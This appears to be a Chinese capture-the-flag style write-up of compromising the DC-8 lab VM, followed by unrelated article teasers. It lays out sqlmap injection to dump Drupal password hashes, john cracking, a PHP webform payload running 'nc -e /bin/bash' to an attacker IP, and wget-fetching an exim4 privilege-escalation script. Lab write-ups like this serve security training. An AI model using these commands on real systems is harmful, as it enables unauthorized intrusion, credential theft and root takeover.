靶机渗透之DC-8

news2024/11/25 2:56:17

一、信息收集

扫一下子网段,发现靶机ip为192.168.145.130。

nmap -sP 192.168.145.*

进一步进行端口、系统等信息扫描,开放的端口为80、22,中间件为apache。

nmap -sT -T4 -sV -O -sC -p1-65535 192.168.145.130

再扫一下网站目录,除了扫出一个登录后台,没啥有用的。

dirsearch -u http://192.168.145.130/

扫一下网站的信息,中间件为Drupal 7,网上搜了一下没啥可以利用的poc。

whatweb -v http://192.168.145.130/

二、getshell

直接访问网站看看咯,随便点击看看有无啥漏洞。

经过我仔细的观察,点击Details下面的标签url就会出现参数。例如点击Welcome to DC-8,就会有个nid=1的参数。

点击Who We Are的话,就变成nid=2。

我们改成nid=1*2,发现它返回了Who We Are的页面。说明服务端那边执行了1*2这个代码,所以存在sql注入,直接扔到sqlmap跑就ok了,sqlmap也说存在注入漏洞。

sqlmap -u "http://192.168.145.130/?nid=1"

爆库。

sqlmap -u "http://192.168.145.130/?nid=1" -dbs

爆d7db库里面的表,发现有个users的表。

sqlmap -u "http://192.168.145.130/?nid=1" -D d7db  --tables  

继续爆这个表里面的列,name和pass估计就是用户名和密码啦。

sqlmap -u "http://192.168.145.130/?nid=1" -D d7db  -T users --columns 

查看这两个列的值,用户名分别为admin和john,密码是经过了加密滴。

sqlmap -u "http://192.168.145.130/?nid=1" -D d7db  -T users -C 'name' --dump
sqlmap -u "http://192.168.145.130/?nid=1" -D d7db  -T users -C 'pass' --dump

去爆破一下密码,把密码复制到一个.txt文件里面,用john来进行爆破。我这里已经爆破过一次了,所以不会直接显示明文,要输入命令来查看。

john --wordlist=/usr/share/wordlists/password.lst --rules 1.txt //爆破

john --show 1.txt  //查看

不过也只能爆破处john用户的密码,admin的爆破不出来,访问我们上面扫出的登录后台,登录进去看看先。

随便点点看有无反弹shell的地方,经过我废寝忘食的努力,终于在Contact Us这里找到反弹shell了。点击Wobform,会看到有个Form settings的模块。这个应该就是让你设置表单,表单会随着你的你的联系一起提交的。

Form settings支持写入php代码,那么我们直接通过php命令执行函数写入nc反弹shell即可。注意!!注意!!注意!!一定得在第一行加<p>xxxx</p>,不然会执行不了命令,我们不知道为啥,但这是泪的教训,记得点击下面的保存。

<p>hhhh</p>
<?php
system("nc -e /bin/bash 192.168.145.171 3333");
?> 

kail开启监听,然后随便提交一点东西。

nc -lvvp 3333

成功反弹shell,py打开一个交互式面板。

python -c 'import pty; pty.spawn("/bin/bash")'

三、提权

我翻了一下,没发现有啥提权的提示,查看有无sudo权限。好吧,需要输入密码,那基本是鸡鸡了。

sudo -l

再看看能不能suid提权咯,发现还是有挺多命令具有suid权限滴,但都是我没见过的命令。没有那些例如find等常见的命令,然后我就去一条一条命令地搜,比如chfn提权。哈哈哈,没办法只能这样了。

find / -perm -u=s -type f 2>/dev/null

功夫不负有心人,找到一个exim4 suid提权,其实exim4不是一个命令,属于一个第三方应用。不管那么多,能提权就行,先看一下exim4的版本。

/usr/sbin/exim4 --version

再去kali的漏洞库搜一下有无直接可以利用的脚本,怎么判断该用哪个脚本呢。先看脚本利用的对应版本嘛,第三个能利用的版本为4.87-4.61符合上面我们的exim 4.89的版本。然后再看看这个脚本是干啥的,写Privilege Escalation就是权限提升的意思,结合这些信息不难判断出用哪个。

searchsploit exim 4.8

把这个脚本复制一份然后放到/var/www/html目录下面,python开启一个http服务。

python -m http.server 80

靶机进入到tmp目录,下载脚本。

wget http://192.168.145.171/46996.sh

给予脚本执行权限。

chmod 777 46996.sh

查看一下脚本看看是如何使用滴,一共两种方法,具体使用哪一种,我们两个都试试不就得了。

经过测试,第二种方法可行滴。

./46996.sh -m netcat

查看flag,至此结束。

四、总结

不算难的靶机,只是反弹shell的时候第一句记得是<p>xxx</p>,还有exim提权没遇到过,只能上网去搜了。

最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1872460.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

网络抓包分析工具

摘要 随着网络技术的快速发展&#xff0c;网络数据的传输和处理变得日益复杂。网络抓包分析工具作为网络故障排查、性能优化以及安全审计的重要工具&#xff0c;对于提升网络管理的效率和准确性具有重要意义。本文旨在设计并实现一款高效、易用的网络抓包分析工具&#xff0c;…

从ChatGPT代码执行逃逸到LLMs应用安全思考

摘要 11月7日OpenAI发布会后&#xff0c;GPT-4的最新更新为用户带来了更加便捷的功能&#xff0c;包括Python代码解释器、网络内容浏览和图像生成能力。这些创新不仅开辟了人工智能应用的新境界&#xff0c;也展示了GPT-4在处理复杂任务方面的惊人能力。然而&#xff0c;与所有…

OZON与WB平台自养号测评:优势与搭建步骤解析

随着俄罗斯跨境电商市场的蓬勃发展&#xff0c;OZON和WB平台吸引了越来越多的国内卖家入驻。为了提升产品权重、增加曝光度并加速销售&#xff0c;许多卖家选择通过自养号测评的方式来优化店铺运营。自养号测评在OZON和WB平台上具有多重显著优势。 一、自养号测评的优势 1. 权…

C++编程(一)C++与C语言的一些区别

文章目录 一、QtCreator基本使用&#xff08;一&#xff09;编码格式&#xff1a;&#xff08;二&#xff09;C编程1. 文件后缀2. 编译3. 头文件 二、名字空间&#xff08;一&#xff09;概念以及访问方式1. 概念2. 访问方式&#xff08;1&#xff09;通过作用域限定符进行访问…

如何看待AIGC中漫画版权争议?( 计育韬老师高校公益巡讲答疑实录2024)

这是计育韬老师第 8 次开展面向全国高校的新媒体技术公益巡讲活动了。而在每场讲座尾声&#xff0c;互动答疑环节往往反映了高校师生当前最普遍的运营困境&#xff0c;特此计老师在现场即兴答疑之外&#xff0c;会尽量选择有较高价值的提问进行文字答疑梳理。 *本轮巡讲主题除了…

QT拖放事件之五:自定义拖放操作-拖动中的修饰符操作

1、效果 2、代码 #include "SelfButton.h" #include <QApplication>SelfButton::SelfButton(QString str ,QWidget* parent):Q

嵌入式Linux系统编程 — 4.3 strcat、strcpy函数拼接与复制字符串

目录 1 字符串拼接 1.1 strcat函数 1.2 strncat函数 1.3 示例程序 2 字符串复制 2.1 strcpy函数 2.2 strncpy函数 2.3 示例程序 1 字符串拼接 1.1 strcat函数 在Linux系统中&#xff0c;strcat 函数是C语言标准库中的一个函数&#xff0c;用于将一个字符串追加到另一…

深度解析百数多标签技术:让数据处理更加精准与高效

百数的多标签功能允许用户在单个表单或应用中创建多个独立的标签页&#xff0c;每个标签页可以包含不同的字段和数据。这有助于清晰组织和管理表单内容&#xff0c;使数据结构更加分明。用户可以根据需要添加、删除或重新排序标签&#xff0c;轻松管理复杂数据&#xff0c;提高…

Kafka入门到精通(三)-Kafka

Kafka简介 Kafka是由Apache软件基金会开发的一个开源流处理平台&#xff0c;由Scala和Java编写。Kafka是一种高吞吐量的分布式发布订阅消息系统&#xff0c;它可以处理消费者在网站中的所有动作流数据。 这种动作&#xff08;网页浏览&#xff0c;搜索和其他用户的行动&#xf…

Kali系统的中英文切换

执行命令&#xff1a;sudo dpkg-reconfigure locales 命令作用&#xff1a;重新生成locales配置文件并允许你重新选择所需的语言环境。 中文&#xff1a;zh_CN.UTF-8 UTF-8 英文&#xff1a;en_US.UTF-8 UTF-8 用空格键选中和取消选项。 要设置成中文&#xff1a;取消选择en…

我教会了我妈搭建自己的 AI 聊天机器人...

在这个人工智能爆发的年代,ChatGPT、Claude、Kimi、文心一言等 AI 大模型产品火遍全网,仿佛一夜之间,人人都在谈论 AI。 作为普通人的我们,难道就只能看着程序员们尽情玩耍,自己却无法参与其中吗?NO! 鉴于最近自己社群学员和粉丝的要求&#xff0c;一进来大家无论是不是小白…

springboot的特点是什么?

Spring Boot是一个基于Spring框架的开源项目&#xff0c;它旨在简化Spring应用的初始搭建和开发过程。以下是Spring Boot的一些主要特点&#xff1a; 快速开发&#xff1a; Spring Boot提供了许多默认配置&#xff0c;使得开发者可以更快地开始开发应用程序&#xff0c;而无需…

Centos+Jenkins+Maven+Git 将生成的JAR部署到Jenkins服务器上

背景:前一篇写的是Jenkins和项目应用服务器不在同一个服务器上。但是有的公司可能不会给Jenkins单独弄一个服务器。可能就会出现Jenkins就搭建在某一个应用服务器上。这种情况的参考如下的操作。 1、登录 没有安装的参考下面的安装步骤先安装: Jenkins安装手册 输入账号、…

PT100(RTD)是什么?2线,3线,4线原理

RTDs - or Resistance Temperature Detectors- (电阻式温度探测器)&#xff0c;是温度型传感器&#xff0c;包含一个电阻&#xff0c;这个阻值可以随温度的变化而变化。在工业的进程中和实验室里已经使用了很多年&#xff0c;以精确&#xff0c;可靠和稳定的特性。 2线制 2线制…

linux的常用系统维护命令

1.ps显示某个时间点的程序运行情况 -a &#xff1a;显示所有用户的进程 -u &#xff1a;显示用户名和启动时间 -x &#xff1a;显示 没有控制终端的进程 -e &#xff1a;显示所有进程&#xff0c;包括没有控制终端的进程 -l &#xff1a;长格式显示 -w &#xff1a;宽…

聊一聊 C# 弱引用 底层是怎么玩的

一&#xff1a;背景 1. 讲故事 最近在分析dump时&#xff0c;发现有程序的卡死和WeakReference有关&#xff0c;在以前只知道怎么用&#xff0c;但不清楚底层逻辑走向是什么样的&#xff0c;借着这个dump的契机来简单研究下。 二&#xff1a;弱引用的玩法 1. 一些基础概念 …

主播美颜工具开发全攻略:美颜SDK从基础到进阶的技术指南

今天&#xff0c;笔者将为你详细介绍美颜SDK的基础知识以及如何进行进阶开发。 一、美颜SDK基础知识 什么是美颜SDK&#xff1f; 美颜SDK是一种软件开发工具包&#xff0c;包含了一系列用于图像处理的算法和功能&#xff0c;主要用于实时视频处理和图像优化。开发者可以将美…

计算机基础——经典排序算法总结2

直接插入排序的过程&#xff1a;先将序列第一个记录暂时作为有序子序列&#xff0c;从第二个开始逐个进行插入&#xff0c;直至整个序列有序。一趟排序将elem[i]插入到已排好序elem[0…i-1]中各元素做比较后的任何对应位置&#xff0c;所以未必能选出一个元素放在其最终位置上。…

自定义 vant 的 van-calendar 日历控件

最近在做 vue 微信公众号项目&#xff0c; 有个自定义日历控件展示的需求&#xff0c;经过查阅资料&#xff0c;最终实现了如图所示效果&#xff0c;这里做了总结&#xff0c;需要的小伙伴可以参考一下&#xff1a; HTML代码&#xff1a; <template><div class"…

YOLOv10(7):YOLOv10训练(以训练VOC数据集为例)

YOLOv10&#xff08;1&#xff09;&#xff1a;初探&#xff0c;训练自己的数据_yolov10 训练-CSDN博客 YOLOv10&#xff08;2&#xff09;&#xff1a;网络结构及其检测模型代码部分阅读_yolov10网络结构图-CSDN博客 YOLOv10&#xff08;4&#xff09;&#xff1a;损失&…